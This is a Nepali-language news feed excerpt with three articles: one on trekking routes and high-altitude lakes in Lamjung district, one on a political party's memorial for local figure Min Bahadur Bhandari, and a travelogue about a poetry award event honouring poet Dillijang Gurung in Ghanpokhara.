हुन्छन । पहेलो, सेतो, रातो, निलो, गुलाबी रङ्गका फूलहरूले दुधपोखरी जाने पर्यटकहरूलाई स्वागत गरिरहेको हुन्छ ।
बाह्रपोखरी मर्स्याङदी र दोर्दी गाउँपालिकाको सीमा क्षेत्रमा पर्दछ । पर्यटनको क्षेत्रमा बाह्रपोखरीलाई बराहपोखरी पनि भन्ने गरिन्छ । प्राकृतिक सौन्दर्यले आकर्षक बाह्रपोखरी खुला मैदान अर्थात चरिचरन क्षेत्र र त्यहाँबाट नजिकै देखिएका हिमाललाई क्यामेरामा कैद गर्न सकिन्छ । बाह्रपोखरीबाट मनास्लु हिमश्रृखला अन्तर्गतका हर्कजुङ हिमाल, हिमालचुली, मानश्री पिक र मनास्लु हिमाल दृश्यावलोकन गर्न सकिन्छ । मनमोहक हिमाली दृश्यसँगै लालीगुराँस फुल्ने समयमा थरीथरीका लालीगुराँसले मनोरम दृश्यावलोकले निकै रमाइलो हुन्छ । प्रकृतिमा रमाउनेहरूका लागि बराहपोखरी यात्र निकै रमणीय हुन्छ । डाँडैडाँडाको बाटो जताततै हरियाली वतावरण जस्ता प्रकृतिक सुन्दरताले पर्यटकहरूलाई यात्रामा आनन्द हुन्छ । बाह्रपोखरी क्षेत्रमा कुनै स्थायी संरचना छैन । बाह्रपोखरी जाने पर्यटकहरू अस्थायी गोठमा रात बिताउनु पर्दछ । कतिपयले आँफैले लगेका टेन्ट, त्रिपाल, रुखको फेद वा पहरामा ओत लागेर पनि रात बिताउने गर्दछन । बाह्रपोखरी जानको लागि बेसीशहर नगरपालिका– ११ मा पर्ने चिति हुँदै माझगाउँ, पुरानो दुबार हुँदै जान सकिन्छ । यस्तै बेसीशहरदेखि भुष्मे, छिनखोला, दुबार हुँदै पनि पुग्न सकिन्छ ।
लमजुङमा हिमाली क्षेत्रमा पदमार्ग बन्न थालेको छ । दोर्दी गाउँपालिकाको नौथर शेरा इलमपोखरी, लिपे लेक, नौटांचे, मुल्मचे, उखण्ड ताँजे नौथरसम्म र नौथर शेरा इलमपोखरी, लिपे लेक, नौटांचे, मुल्मचे, उखण्डबाट मेमे पोखरी, कुम्रो डाँडा बाह्र पोखरी हुँदै हिलेटक्सार, पुरानो दुवार वा पिसहिल तर्फबाट बेसीशहरसम्मको रुट रहेको छ । लिपेको सिधै अगाडि देखिने हिमालचुली हिमाल पनि दोर्दी गाउँपाकिकामा पर्दछ । लिपे लेकबाट नौटाँचे, चेपेको शिरको दूध पोखरी हुँदै गोर्खाको अजिरकोट निस्केर रुबिनाला पास हुँदै लार्केपास छिचोलेर मनाङ निस्कन सकिन्छ । मानव वस्ती नभएकाले यो रुटमा मोटरबाटो छैन । पश्चिमतिरको रुट बाह्रपोखरी हुँदै मेमे पोखरी जान सकिन्छ । पूर्वतिरको रुट इलमपोखरी हुँदै लिपे जान सकिन्छ । पूर्वी रुटको लिपे र पश्चिम रुटको मेमेपोखरी जोडनका लागि अहिले काम भइरहेको छ । लमजुङको हिमाली काख यति सुन्दर छ जहाँ पर्यटकहरूलाई रमाउन कुनै कृत्रिमताको आवश्यता पर्दैन । प्रकृतिप्रदत्त छटा, छहरा, छाँगा, झरना, हिमाल, पहाड, ताल, तलैया, पोखरी, दह, डाँडाकाँडा, उच्च ढिस्को, वनजंगल, खहरे, खोल्सो, खोलानाला, नदी, खोँच, गल्छी, भीर, पहरा, ओढार, ओढारे प्राचीन घरहरूको भग्नावशेष, जुरेडाँडा आदि पर्दछ ।
लमजुङ पूर्वमा चेपे नदी र पश्चिममा रुदीखोला र मादी नदी बिचमा पर्दछ । लमजुङ समुद्री सतहको ३८५ मिटरदेखि ८ हजार १६३ मिटर मनास्लु हिमालसम्मको उचाइमा पर्दछ । लमजुङमा ४५ हजार ९४० हेक्टर खेती योग्य जमिन रहेको छ भने जिल्लाको कुल क्षेत्रफल १ हजार ६९२ वर्ग किलोमिटर मध्ये आधा भन्दा बढी हिमाली क्षेत्रमा पर्दछ । जहाँ मानव बस्ती छैन । ती क्षेत्रमा हिम ताल तलैया र धेरै ठाउँमा भेडा बाख्रा, गाई भैंसीको चरिचरण अर्थात खर्कहरू पर्दछ । लमजुङको भू–बनोटको सामान्य पहाडी जिल्ला भएपनि नदी किनारका समतल मैदान एवं टारहरू, खोंच, बेसी र हिमाली क्षेत्र पनि पर्दछ । भौगोलिक विविधताले गर्दा लमजुङको हावापानी र प्राकृतिक वनस्पतीमा पनि विविधता रहेको छ । लमजुङमा हिमाली हावापानीदेखि लिएर उष्ण मनसुनी हावापानीसम्म पाइन्छ । लमजुङ जिल्लाको पूर्वमा दुधपोपरी र पश्चिममाक्व्होलासोथार अर्थात चेपे नदी र रुदीखोला बीचमा हिमाली काखमा धेरै हिम पोखरी र कुण्डहरू छन । दोर्दी र मस्र्याङदी गाउँपालिका भित्र पर्ने ङादी खोलाको शिर र मनाङ जाने बाटोमा देखिने बुङ छहराको शिरमासमेत हिम पोखरी र कुण्डहदेखि  पर्दछन । तर सबैको खोज अनुसन्धान हुन सकेको छैन ।
तपाईं पनि लमजुङको हिमाली क्षेत्रमा पदयात्राका लागि जान खोज्नु हुन्छ भने मौसम, हावापानी आदि विचार गरेर लुगालगायत पदयात्राका लागि चाहिने सामग्री जुटाउनु पर्दछ । हिमाली क्षेत्रमा खान बस्नको लागि सिजनमा भेडा गोठ र गाई भैंसीका गोठ भेटिन्छन । तर पनि यात्राको लागि आवश्यक सबै बस्तु साथमा जैजान पर्दछ । पदयात्राको लागि झोला, जुत्ता, लठ्ठीलगायत सामग्री नभई हुँदैन । जुत्ता आरामदायी, बाक्लो सोल र ग्रिप भएको, झट्ट पानी नछिर्ने, हिलो र हिउँमा नचिप्लने चाहिन्छ । ट्रेकिङ ज्याकेट, टिसर्ट, ट¥याक, ट्राउजर, टोपी, मोजा र पञ्जा आवश्यक पर्दछ । हिमाली क्षेत्रमा जाँदा फेदर डाउन ज्याकेट लगायत न्यानो लुगा साथमा हुनु पर्दछ । पदयात्रामा निस्कँदा प्राथमिक उपचारका औषधि र सामग्री साथमा बोक्नु पर्दछ । आफूले कुनै नियमित खाने गरेको औषधि छ भने नबिर्सिइ झोलामा राख्नु पर्दछ । अर्कोतर्फ धेरै दिनसम्म व्याकअप दिने मोवाइलको चार्जर झोलामा राख्न बिर्सन हुदैन ।
(लेखक : पर्यटनका विषयमा विशेष दखल राख्नुका साथै सो क्षेत्रमा कलम चलाउनु हुने उहाँ स्वतन्त्र पत्रकार संघ नेपालका निवर्तमान राष्ट्रिय अध्यक्ष हुनुहुन्छ । – सं.)
]]>
https://www.antaranganews.com/?feed=rss2&p=25326 0
स्वतन्त्र अभियानका नायकको स्मरण https://www.antaranganews.com/?p=23633 https://www.antaranganews.com/?p=23633#respond Sat, 13 Apr 2024 12:08:07 +0000 https://www.antaranganews.com/?p=23633 चण्डीस्थान(लमजुङ)– लमजुङको बेसीशहर नगरपालिका– ६ को सारिङ निवासी स्वतन्त्र अभियानका नायक मीनबहादुर भण्डारीको स्मरण गरिएको छ । उहाँको वार्षिक पुण्य तिथिका अवसरमा राष्ट्रिय स्वतन्त्र पार्टी(रास्वपा)को बेसीशहर नगरसमितिले बैशाख १ गते उहाँको स्मरण गरेको हो ।
सो अवसरमा रास्वपाका नगर अध्यक्ष कृष्णबहादुर राउतले स्व. भण्डारीको व्यक्तित्व र कीर्तित्वमा प्रकाश पार्नु भएको थियो । उहाँले रास्वपाको जन्म हुनु अघि नै स्थानीय निर्वाचनको बेलामा देशका ठूला भनिने पार्टीको पछि लागेर देश बन्दैन भन्ने उहाँले अठोर गर्नु भई अब फरक बाटो हिड्नु पर्छ भन्ने उदघोष गर्नु भयो । त्यसकै परिणाम स्वरुप यो वडामा हामीले स्वतन्त्र रुपमा प्रकाश थापालाई वडाध्यक्षमा चुनाव जिताउन सफल भएका हौं भन्नुभयो । स्व. भण्डारी साहसिक, समाजका लागि अमूल्य योगदान गर्नु हुने निर्भिक व्यक्तित्वका धनी हुनुहुन्थ्यो, हामीले उहाँकै पदचाप पछयाउँदै उहाँको सपना साकार पार्नेतर्फ लागि परेका छौं राउतले भन्नुभयो ।
यसैगरी, रास्वपाका जिल्ला सहसंयोजक अशोक सापकोटाले उहाँ स्वर्गे हुनु भएको हिजो जस्तो लाग्छ तर एक वर्ष भइसकेछ भन्दै स्व. भण्डारीले आफ्नो नेतृत्वमा नेपालभरमै यो वडालाई नमूना वडा बनाउन सफल हुनु भएको छ । ऐले मुलुकभर उहाँकै अभियान सञ्चालन भइरहेको छ भन्दै उहाँको सपनालाई साकार पार्न सक्दा मात्रै उहाँ प्रति सच्च श्रद्धाञ्जली हुने उल्लेख गर्नु भयो ।
राष्ट्रिय स्वतन्त्र पार्टीकोतर्फबाट तयार गरिएको श्रद्धाञ्जली पत्र स्व. मीनबहादुरकी धर्मपत्नी विष्णुमाया भण्डारी र माहिला छोरा भरत भण्डारीलाई रास्वपाका जिल्ला सहसंयोजक अशोक सापकोटा, सो दलका नगर सभापति कृष्ण राउत, सोही पार्टीका उक्त वडाका सभापति तेजबहादुर भण्डारी, सो दलका कार्यकर्ता एवम् वरिष्ठ पत्रकार नवराज पहाडी, रास्वपाका कार्यकर्ता राजकुमार राउत लगायतले संयुक्त रुपमा हस्तान्तरण गर्नु भएको थियो ।
संक्षिप्तमा मीनबहादु भण्डारी :
विसं १९९९ सालको चैत १२ गतेका दिनमा आमा टोपली र बाबा कालु भण्डारीको कान्छो सुपुत्रको रुपमा उहाँको सोही गाउँमा जन्म भएको हो । भारतीय सेनाबाट हवल्दार पदमा निवृत्त हुनुभएका उहाँ गाउँमा फर्केपछि सामाजिक काममा भिज्न थाल्नु भयो । सो क्रममा गाविसको उपाध्यक्ष हुनुका साथै गंगा मिलन माध्यामिक विद्यालय व्यवस्थापन समितिको सदस्य, रेडक्रस सोसाइटीको आजीवन सदस्य, नेकपा एमालेको वडा कमिटिको संयोजक लगायतका पदमा रहेर काम गर्नु भएको थियो ।
निरोगी तथा ऋष्टपुष्ट रहनु भएका उहाँलाई गाउँको वनभोज कार्यक्रममा जाँदा अचनाक पेट दुख्न गयो, त्यसपछि वनभोज समेत नखाई स्थानीय स्वास्थ्य चौकीमा उपचारका लागि लगियो । सलाई चढाएर डिस्चार्ज गरियो । तर पनि उहाँको शरिर गल्न छाडेर भोलिपल्ट थप उपचारका लागि काठमाडौं जाने क्रममा उहाँको बाटोमै निधन हुन गएको हो । त्यस समयमा उहाँ ८१ वर्षको हुनुहुन्थ्यो ।
उक्त कार्यक्रमको सञ्चालन राष्ट्रिय स्वतन्त्र पार्टीका वडा सभापति तेजबहादुर भण्डारीले सञ्चालन गर्नु भएको थियो ।

]]>
https://www.antaranganews.com/?feed=rss2&p=23633 0
नियात्रा : साहित्यका लागि पर्यटन काव्ययात्रा : लमजुङको घनपोखरा र राइनासकोट https://www.antaranganews.com/?p=23504 https://www.antaranganews.com/?p=23504#respond Fri, 05 Apr 2024 01:47:07 +0000 https://www.antaranganews.com/?p=23504 ठाडोभाका लोककला प्रतिष्ठान नेपाल लमजुङले मलाई दोस्रो पटक लमजुङ भम्रण गर्ने सुनौलो अवसर जुराइ दियो । वेदान्त शिरोमणि कविवर दिल्लीजङ गुरुङको ११९औं जन्म जयन्तीका अवसरमा आयोजना गरिएको राष्ट्रव्यापी खुला कविता प्रतियोगितामा छनौट भएको खबर प्रतिष्ठानका अध्यक्ष नवराज पहाडीले मेसेन्जर र फोनबाट गराउनु भयो । कुनै पनि मानिसका लागि आफूले गरेको काममा सफलता पाउँदा खुशीको कुरा त अवश्य हो नै, तर एउटा कलम चलाउने मानिसको सिर्जनाले उत्कृष्ट स्थान पाउनु जस्तो खुशी उनका लागि ठूलो खुशी अरु कुनै हुन सक्दैन ।
यो खबर पाएको दिनदेखि मेरो मनमा लमजुङ खेल्न थाल्यो । आमन्त्रण गरिएको पत्र कम्प्यूटरमा घरी घरी खोलेर हेर्न मन लाग्न थाल्यो । दोहोर्याएर तेह्रयाएर पढ्न थाले पत्रलाई । मैले चैत्र ६ गतेका दिन लमजुङ जाने निधो गरे । चैत्र ६ गते बैतडी गोठलापानीबाट महेन्द्रनगरका लागि चल्ने दिवा सेवाको बसमा टिकेट काटियो । बिहान ६ः४० बजे छुटेको बसको बी साईडको ३– ४ नम्वरको सीटमा मेरो जीवन सहयात्री सीता दयालका साथमा साँझ ५ः०० तिर महेन्द्रनगर नानीबाबुहरूको कोठामा पुग्यौं ।
बैतडीबाट चार दिनको यात्रा पार गरी लमजुङमा :
भोलिपल्ट ७ गतेका दिन नानीबाबुहरूसंग बसियो । ८ गतेका दिन महेन्द्रनगरबाट पोखरा जाने बसमा तनहुँको डुम्रे बजारसम्मको टिकट काटियो । भोलि महेन्द्रनगरबाट पोखराको गाडीमा आउँदैछु भनेर प्रतिष्ठानका अध्यक्ष पहाडीलाई जानकारी गराएँ । एउटा उत्साह बोकेको भ्रमणका बारेमा मैले मेरा शुभ चिन्तकहरूमा बेला बेलामा खबर सम्प्रेषण गरिरहन्थे ।
यात्रा लमजुङ हुने भएपछि २०७५–७६ साल तिर बैतडी जिल्लामा प्रमुख जिल्ला अधिकारी रहेका आनन्द पौडेल सरलाई सम्झे । उनलाई मैले आफ्नो यात्राबारे फोन सम्पर्क गरेर जानकारी गराए । उहाँ मेरो जीवनका मुख्य अभिभावक तथा शुभचिन्तक हुनुहुन्छ । उहाँले आफू अहिले प्रधानमन्त्रीको कार्यालय बालुवाटारमा कार्यरत रहेको सुनाउनु भयो । उहाँले भन्नुभयो, ‘अब त मलाई बैतडीले बिर्सिसक्यो होला ।’ उहाँले बैतडी जिल्लाबाट उद्योग मन्त्री बनेका माननीय दामोदर भण्डारीलाई सम्झनु भयो । तत्कालीन अवस्थादेखि हालसम्म शिक्षा विकास तथा समन्वय इकाइ प्रमुख नरेन्द्रराज अवस्थीलाई पनि उहाँले सम्झिनु भयो । उहाँ सितको लामै सम्वाद बैतडी र लमजुङका बारेमा चल्यो र मलाई बधाई पनि दिनु भयो ।
चैत्र ८ गते महेन्द्रनगर पोखराका लागि १ः०० बजे छुट्ने भनिएको बस आधा घण्टा ढिलो गरी साढे एक बजे छुट्यो । भोलिपल्ट ९ गतेको बिहान तनहुँको डुम्रेबजार पुर्यायो । म त्यही डुम्रेमा झरे । डुम्रेबजारबाट तुुरन्तै लमजुङको बेसीशहरका लागि गाडी चढे । स्थानीय गाडी भएको हुनाले बाटो बाटोमा यात्रीहरू झार्दै हाल्दै गरेर १२ः३० बजे बेसीशहर पुर्यायो ।
प्रतिष्ठानका अध्यक्ष नवराज पहाडीले भने अनुसार नै बेसीशहरको माइक्रो काउन्टर नजिक झरे र नवराज पहाडी सर त्यही स्थानमा आएर मलाई रिसिभ गर्नु भयो । उहाँले नजिककैको एउटा होटेलमा मलाई बसाएर आफू कार्यक्रम स्थल घनपोखरा जाने तयारीमा जुुट्नु भयो । यस प्रकार म बैतडीबाट चार दिनको यात्रा पार गरी लमजुङमा पुगेको थिए ।
सिमसिम पानीको स्वागत, शीतप्रवाह र सुधा नदी किनारको बस यात्रा र पुलकित हामी :
बेसीशहरबाट आयोजकले हामी सबैलाई बस लाने बन्दोबस्त गरेको रहेछ । बस दुई बजेतिर चोकमा आई पुग्यो । सहभागी साथीहरू र आयोजकहरू जम्मा हुँदै गए । काठमाडौंबाट पनि एउटा बसमा स्रष्टाहरू निम्त्याइएका रहेछन् । त्यसको नेतृत्व स्वयम् आयोजक प्रतिष्ठानका अध्यक्ष पहाडीले गर्नु भएको थियो । हामी करिव चार बजेतिर कविवर दिल्लीजङ गरुङको जन्मघर मस्र्याङ्दी गाउँपालिका– २ घनपोखराको बाटो लाग्यौं, जहाँ कार्यक्रम स्थल थियो । त्यो बेलामा सिमसिम पानी परिरहेको थियो । लाग्यो ! हामीलाई प्रकृतिले पनि स्वागत गरिहरेको छ । हामी केहीका लागि नयाँ बाटो, नयाँ गाउँहरू, मैले देखेका र अनुमान गरेका भन्दा फरक घरहरू, खेतिपातीहरू, हरियाली जंगल देखिए । बेसीशहरबाट मर्स्याङदी नदीको पूर्व तिरको भेगबाट त्यो नदीसँग लुकामारी खेल्दै मालेबगर, बगैंचा हुँदै भलाम खोला हुँदै नयाँ नयाँ दृश्यहरू आँखामा कैद गर्दै गन्तव्यतर्फ लागियो । त्यो सडक नेपालका प्रसिद्ध १० पदयात्रा मध्येको एक अन्नपूर्ण चक्रीय पदमार्गसमेत रहेछ । तर ऐले भने सडक मनाङसम्मनै पुगेको हुँदा पदमार्गको आवस्था भने कथा जस्तो बनिसकेको रहेछ । जे होस् सिमसिम पानीको स्वागत, शीतप्रवाह र सुधा नदी किनारको बस यात्राले हामीलाई निकै पुलकित बनाएको थियो ।

साहित्यका लागि पर्यटन काव्ययात्रा :
हामीहरूका लागि रिजर्भ गरिएका दुवै बसमा ‘साहित्यका लागि पर्यटन काव्ययात्रा’ नामक व्यानर टाँसिएको थियो । होमस्टेको हव बन्दै गरेको लमजुङले अब साहित्यका माध्यमबाट पनि पर्यटनको विकास गर्ने योजना बनाइरहेको आयोजक प्रतिष्ठानका अध्यक्ष पहाडीले सुनाउनु भयो । त्यो भनाईले पनि हामीलाई फरक स्वाद दिइरहेको थियो ।
बसीशहरबाट छुटेको बस बगैंचा भन्ने ठाउँमा ऐले बजार विस्तार हुने क्रममा रहेको देखियोप, वारी पारी, अगाडि जता हेरे पनि पहाडै पहाड मलाई आफ्नै गाउँमा घुमेझैं अनुभूति भएको थियो ।
त्यसपछि भने हामी मर्स्याङदी(शीतप्रवाह) नदी छाडेर खुदी(सुधा नदी) खोला र मुख्य खुदी बजारलाई छाडेर वारी बायाँतर्फबाट घनपोखरा बेसी अर्थात कार्यक्रम स्थल रहेको मोर्ङी गाउँ पुगियो । जो मर्स्याङदी– २, घनपोखराको कविवर हुर्के बढेको स्थाल (निवास)मा पुगियो । जो कार्यक्रम स्थलको क्षेत्र समेत रहेछ । त्यो गाउँमा पुग्ने वेलामा पनि मसिनो सिमसिम पानी पर्ने क्रम रोकिएको थिएन । लाग्थ्यो, त्यो ऐतिहासिक स्थलोमा कविवरले हाम्रो स्वागतका लागि स्वर्गबाट स्वागत गरिरहेको छ । काठमाडौंबाट आएको गाडी र हामी चढेको गाडीसंग संगै पुगेको थियो । जब हामी कविवरको निवासमा पुग्यौं, हामीलाई त्यहाँ रहेको मिलिजुली र सिर्जनशील आमा समूहमा आवद्ध दिदी बहिनीहरूले सबैको घाँटीमा फूलमाला पहिराएर स्वागत गर्नु भयो ।
जल भरिएका गाग्री, भुुटेका मकै, भटमास, गुन्द्रुकको अचार र मोहीका परिकार :
कविवरको निवासमा प्रवेश गर्ने थल, गेटमा पानीका जल भरिएका गाग्रीहरू राखिएका थिए । अलि अलि चिसो बढेको थियो । हामीलाई तातो पानी दिइयो । त्यसपछि खाजा स्वरुप त्यही गाउँमा उत्पादन भएको अर्गानिक वस्तुहरू भुुटेका मकै, भटमास, गुन्द्रुकको अचार एक ग्लास मोही (ठेकीबाट सारेर) हाम्रा हात हातमा थमाइयो । साथमा सेल रोटी पनि थियो, सबै साथीहरूले फोटाहरू खिच्दै र खाजा खाँदै गर्न थाले । यस कार्यबाट गाउँको महत्व दर्शाइरहेको अनुभूति भइरहेको थियो ।
खाजा खाइसकेपछि अतिथिहरूलाई रातमा बस्न/सुत्न सेल्टरका लागि कविवरको निवासको केही तल कविवरले आफ्नो पालामा भूमिदान गरी निर्माण गरिएको त्रिभुवन माविका कोठाहरूमा व्यवस्थान गरिएको रहेछ । विद्यालयका कोठाहरू निकै सफा सुग्घर थिए । कार्पेट र म्याटहरू बिछ्याइएको थियो । ओड्नका लागि व्यवस्थापकले रेडक्रस लगायतका संस्थाहरूबाट कम्बलहरू जुटाइएको रहेछ । हामी त्यहाँ पुगेर हामीले आ–आफ्नो सरसमान झोलाहरू राखेका मात्र के थियौं, कविवर निवासको माथि तिर रहेको मोर्ङी सामुदायिक भवनमा आउनु भन्ने जानकारी गराइयो । त्यो भवन निर्माणका लागि पनि कविवरकै परिवारले जग्गा दान गरी निर्माण गरिएको भन्ने सुन्न पाउँदा थप हर्ष लाग्यो ।
आफ्ना झोलाहरू राखेर साँझको खाना खान मोर्ङी सामुदायिक भवनमा गयौं र खाना खाएर भवनको हलमा ठाडोभाकाको कार्यक्रम हुन्छ भन्ने जानकारी आयोजकबाट दिइएको थियो । हामी त्यो कार्यक्रममा सरिक भयौं ।
लमजुङको ठाडोभाकाले सुदुरपश्चिमको देउडा र ठाडी भाका तथा बैतडीको भाडाहा र चैतलोलाई सम्झायो :
साँझको खाना पछि ठाडोभाका कार्यक्रम शुरु भयो । ठाडोभाकाको बारेमा ठाडोभाका लोककला प्रतिठानका अध्यक्ष नवराज पहाडीले त्यसको इतिहास, परिभषा, वर्तमानमा ठाडोभाकाको अवस्थाबारे प्रकाश पार्नु भयो । कलाकर्मीहरूबाट ठाडो लोक भाका गाउन लगाइयो । हलमा हाामी पाहुना र स्थानीयको खचाखच भिडका बीचमा ठाडोभाका गुञ्जायमान भयो । साह्रै मिठो स्वरमा गाइएको भाकामा कलाकारसगैं अतिथिहरू पनि छमछमी नाच्न थाले । रातको एक बजेसम्म कार्यक्रम धुमधामका साथमा चल्यो ।
ठाडोभाका गाएर सवाल जवाफ गर्दा म मेरो जिल्लाको देउडा र ठाडी भाका सम्झिराखेको थिए । पुरुष र महिला बीच बीचमा एकअर्का सित स्वर मिलाएर गाउँदा म मेरो जिल्लाको भाडाहा र चैतलोलाई सम्झिरहेको थिए । कार्यक्रम एक बजे समापन भएपछि आराम गर्न आ–आफ्नो ठाउँमा गएर आराम गर्यौं ।
भोलिपल्ट अर्थात चैत १० गते कार्यक्रमको मुख्य दिन । बिहान पाँच बजे उठी हात मुख धोएर विद्यालयकै प्राङ्गण वरिपरि घुमघाम गरियो । सात बजे माथि कविवरको निवासमा नास्ताका लागि जानु पर्ने समय थियो । हामी त्यहाँ पुग्यौं र नास्ता चलिरहेको थियो । नास्तामा सेल, तरकारी, चटनी र चिया खायौं । केहीबेर फोटो सेसन चल्यो ।
वेदान्त शिरोमणि कविवर गुरुङको सालिका अनावरण :
त्यसपछि निर्धारित समय अनुसार ८ बजे त्रिभुवन माविसगैं जोडिएर रहेको लाँकुरी चौतारा– जहाँ बसेर वेदान्त शिरोमणि कविवर गुरुङले कविता कोर्ने गुर्न हुन्थ्यो मात्र हैन, लाँकुरी नामक खण्डकाव्य समेत लेख्नु भएको जानकारी पाइयो । त्यो चौतारासँगै कविवरको सालिक स्थापना गरिएको रहेछ । त्यो स्थलमा त्यो वडाको कार्यालय भवन, स्वास्थ्य चौकी भवन समेत तारबारको घेरामा रहेछ । त्यो जग्गा समेत कविवरकै परिवारबाट प्रदान गरिएको जानकारी मिल्यो ।
संस्कृतिविद् एवम् नेपाल प्रज्ञा प्रतिष्ठानका निवर्तमान उपकुलपति डा. जगमान गरुङ :
कविवर डिल्लीजङ गुरुङको सालिक अनावरणको कार्य प्रारम्भ भयो । कार्यक्रमका प्रमुख अतिथि संस्कृतिविद् एवम् नेपाल प्रज्ञा प्रतिष्ठानका निवर्तमान उपकुलपति डा. जगमान गरुङ अघिल्लो दिनमा नै कार्यक्रम स्थलमा आइसक्नु भएको थियो । कार्यक्रमलाई उहाँको उपस्थितिले निकै गौरवपूर्ण बनाएको अनुभव गरिएको थियो । उहाँबाट सालिक अनावरणको काम गरियो । सालिक अनावरण पश्चात सालिकसगैं उभिएर फोटो खिच्ने काम पालोपालो गरियो । कविवर दिल्लीजङ गुरुङका परिवारहरू, स्थानीयहरू, कार्यक्रमका अतिथीहरू सबैले सालिकसंग एकल, युगल र सामूहिक रुपमा फोटा खिच्ने काम भयो ।
अनावरणको काम समापन पछि सबैलाई डिल्लीजङ गुरुङको निवासको माथि रहको कार्यक्रम स्थल मोर्ङी सामुदायिक भवनमा उपस्थित हुनु पर्ने पूर्व जानकारी थियो । त्यो भवन रोडको नजिक थियो । गाडीहरू त्यसै ठाउँमा स्टेण्ड गरिका थिए । घर फर्किन सजिलो होस् भनेर । राति वास बसेको ठाउँबाट आ–आफ्नो झोला बोकेर सबै कार्यक्रम स्थलमा पुग्यौं ।
मर्स्याङ्दी गाउँपालिका प्रवर्द्धक :
कार्यक्रम औपचारिक रुपमा सुरु भयो । त्यस कार्यक्रमको सोही स्थान रहेको मर्स्याङ्दी गाउँपालिका प्रवद्र्धक रहेछ । त्यो दृश्यले पनि एकखालको खुशीको सञ्चार गरायो । यो सन्देश मुलुकभरका स्थानीय हतमा पुग्नु पर्छ भन्ने लाग्छ ।
ठाडोभाकामा स्वागत :
कविवर दिल्लीजङ गुरुङका कान्छा सुपुत्र मेजर गोपाल गुरुङ(८२)को अध्यक्षतामा गरिएको कार्यक्रमको प्रमुख अतिथि संस्कृतिविद् डा.जगमान गुरुङ हुनुहुन्थ्यो । अनेसासका नेपाल च्याप्टरका अध्यक्ष राजेन्द्र केशी, गण्डकी प्रदेशसभाका सदस्य भेषबहादुर पौडेल, त्यसै गाउँपालिकाका अध्यक्ष अर्जुन गुरुङ, छिमेकी क्ब्होलासोंथर गाउँपालिकाका अध्यक्ष सूर्यप्रसाद गुरुङ, त्यस जिल्लामा क्रियाशील रहेका विभिन्न राजनीतिक दलका प्रमुख तथा प्रतिनिधिलगायतका थुप्रै गन्यमान्य व्यक्तित्वहरूलाई मञ्चमा आसन ग्रहण गराइयो । कार्यक्रमका सहभागी प्रमुख अतिथि सहितका पाहुनालाई ठाडोभाकामा स्वागत गरी नयाँपन दिइएको थियो ।
तीन कृतिको विमोचन, पुरस्कार वितरण र कवि गोष्ठी :
कार्यक्रममा कविवर डिल्लीजङ गुरुङकाबारेमा कविवर मेदिनीनाथ सुवेदीद्वारा लेखिएको ‘मेरा कविगुरु डिल्लीजङ गुरुङ’, अनेसास नेपाल च्याप्टरको राष्ट्रकवि विशेषांकको दर्पण र आयोजक ठाडोभाका प्रतिष्ठानको स्मारिका विमोचन गरियो । कार्यक्रममा भाषा साहित्य क्षेत्रमा योगदान पुर्याउनु भएका लब्धप्रतिष्ठित व्यक्तित्वहरूलाई दोसल्ला र सम्मानपत्रद्वारा सम्मान गरियो । कवि गोष्ठीमा विभिन्न क्षेत्रका कविहरूले आफ्ना रचनाहरू बाचन गरेका थिए ।
पुरस्कृत हुँदा हर्षित :
गोष्ठीमा प्रतियोगितामा उत्कृष्ठ रुपमा छनौट भएका कविहरूले समेत आ–आफ्नो रचना वाचन गर्नु भयो । प्रतियोगितामा छनौट भएका कविहरूलाई पुरस्कार वितरण गरियो । म आफूले पनि पुरस्कार पाउँदाको पल निकै हर्षानुभूति गरेको थिए । करीब साढे चार बजे तिर कार्यक्रम समापन भयो । कार्यक्रम समापनपछि सबै आ–आफ्नो क्षेत्र तिर फर्किन हतारो गर्न थाले । अधिकाँस सबै समूहमा वा साथी– साथी भएर आएका थिए ।
बैतडीबाट एकल सहभागी :
सुदूरपश्चिमको बैतडीबाट त्यो कार्यक्रममा सहभागी हुन पुग्ने एक जना म मात्र थिए । एक जना पार्वती म्याडम डँडेलधुराबाट प्रतिनिधित्व भए पनि उहाँ काठमाडौंबाट आउनु भएको रहेछ र उतै फर्कनु भयो । काठमाडौंबाट आयोजकले रिर्जभ बसको प्रवन्ध गरेको थियो । मैले पनि मनमनै विचार गरें, मुग्लिङसम्म काठमाडौंकै टिमसँगै जाने र मुग्लिङबाट पश्चिम जाने जो गाडी समात्ने सोंच बनाए । एक जना काठमाडौंबाट आएका साथीलाई मैले यो प्रस्ताव राखे । तर उनले गाडी प्याक छ भन्ने जवाफ दियो । १२ गते फागु पूर्णीमा भएका कारण छुट्टीका दिन लामो दुरीका सवारी साधन चल्छन् कि चल्दैनन् ? भन्ने मनमा मलाई पीर थियो । मैले एउटा उपाय खोजे । मेरो समस्याको हल लोककला प्रतिष्ठानका अध्यक्ष समेत रहेका नवराज पहाडीलाई काठमाडौको टीमसंग कुरा गरिदिनु भनी अनुरोध गरे । उहाँले भन्नुभयो, ‘काठमाडौका साथीहरू आज फर्किदैनन्, आज राइनासकोट बस्छन् भोलि मात्र निस्किन्छन् उनीहरू त ।’ मैले भने ‘म पनि राइनासकोट जान्छु । उहाँले त्यसो भए म कुरा गरिदिन्छु । उहाँले काठमाडौंको टोलीको नेतृत्व गरेका मध्येका एक कवि ऋषभदेव घिमिरेलाई कुरा गरी दिनु भयो । ऋषभले हुन्छ सगैं जाउँला भन्नुभयो । मैले भने ‘सर पक्का हो नि ! मलाई राम्ररी चिनिराख्नु ।’ उहाँले हाँस्दै भन्नुभयो, ‘मलाई पनि चिनिराख्नु ।’ म खुशी भए । एउटा खुशी त साधन पाएर भयो । अर्को त्यो भन्दा ठूलो खुशी भनेको लमजुङकै ग्रामीण पर्यटकीय स्थल राइनासकोटको अध्ययन गर्न पाउनु ।
फागु पूर्णिमा र राइनासकोट :
करीब साढे पाँच बजेतिर घन पोेखराबाट गाडी हिड्यो, राइनासकोट वास बस्ने गरी । त्यो यात्राको उद्देश्य फागु पूर्णिमा राइनासकोटमा मनाउने थियो । बेसीशहरबाट पाउँदी बजारसम्म केही स्थानीय साथीहरू हामीसगैं फर्किए । मध्यमर्स्याङदी जलविद्युत आयोजनाको बाँध स्थल, उदीपुर, भोटेओडार हुँदै हामी पाउँदी पुगेका थियौं । बाटोमा स्थानीय साथीहरूले गाडीमा बसेर गीत गाए, हामी सबैले ताली बजाएर ती साथीहरूलाई साथ दियौं । पाउँदी बजारबाट मर्स्याङदी पारी तरेर उकालोका घुम्ती घुम्ती मोड काट्दै करीब सात बजेतिर पुगियो राइनासकोट ।
राइनास होमस्टेका परिकल्पनाकार राइनास नगरपालिकाका मेयर खड्गबहादुर गुरुङ :
